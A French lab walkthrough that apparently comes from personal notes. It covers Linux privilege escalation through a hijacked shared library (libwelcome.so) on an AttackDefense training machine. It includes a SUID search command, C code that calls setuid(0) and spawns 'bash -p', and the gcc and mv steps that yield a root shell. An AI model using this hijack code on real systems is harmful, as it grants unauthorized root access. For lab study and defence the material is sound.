Séquestration Bibliothèques Partagées (libwelcome.so) - Linux Privilege Escalation

Machine vulnérable site internet attackdefense:

On cherche des fichiers avec des autorisations SUID:

find / -perm -4000 2>/dev/null

Si nous avions la capacité d'écriture, nous aurions pu indiquer le chemin vers lequel libwelcome.so doit aller :

En examinant les fichiers de configuration, nous pouvons voir que la bibliothèque pointe vers un chemin qui n'existe pas (/home/student/lib) :

Ce que nous ferons sera de créer un dossier portant le nom de lib avec le fichier test.c :

Ce script test.c nous donnera un terminal Bash en tant qu'utilisateur root :

#include <stdio.h>
#include <unistd.h>

int welcome(){
        setuid(0);
        setgid(0);
        system("bash -p");
        return 0;
}

Une fois le script créé, mettons ce qui suit pour créer enfin le fichier libwelcome.so :

gcc -fPIC -shared test.c -o libwelcome.so

Une fois créé, déplaçons-le dans le répertoire dir et il l'interprète parfaitement :

ldd /usr/bin/welcome
mv libwelcome.so lib

Exécutons à nouveau /usr/bin/welcome et maintenant il nous renvoie un terminal Bash en tant que root :

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?